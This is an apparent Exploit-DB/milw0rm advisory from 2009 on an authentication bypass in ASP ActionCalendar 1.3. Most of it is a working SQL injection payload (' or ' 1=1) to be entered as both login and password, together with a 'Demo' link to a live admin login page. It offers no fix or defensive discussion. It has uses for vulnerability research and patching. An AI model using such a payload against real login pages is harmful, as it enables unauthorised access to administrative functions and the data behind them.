ASP ActionCalendar 1.3 - Authentication Bypass

EDB-ID:

7807

CVE:

51500

Author:

SuB-ZeRo

Type:

webapps

Platform:

ASP

Published:

2009-01-16

* Founded By : SuB-ZeRo (WaLiD)

* E-mail : Fbh@hotmail.com

* Home : WwW.dz-security.Net

* GreeTZ : D-unit & X.CJP.x & www.dz-security.net & gaza

---------------------------------------------------------

vondor : www.warrenstudios.com

---------------------------------------------------------

Exploit Auth Bypass:



login: ' or ' 1=1

passw: ' or ' 1=1

----------------------------------------------------------

-[!]

Demo :

http://www.warrenstudios.com/actioncalendar/admin.asp

----------------------------------------------------------

# milw0rm.com [2009-01-16]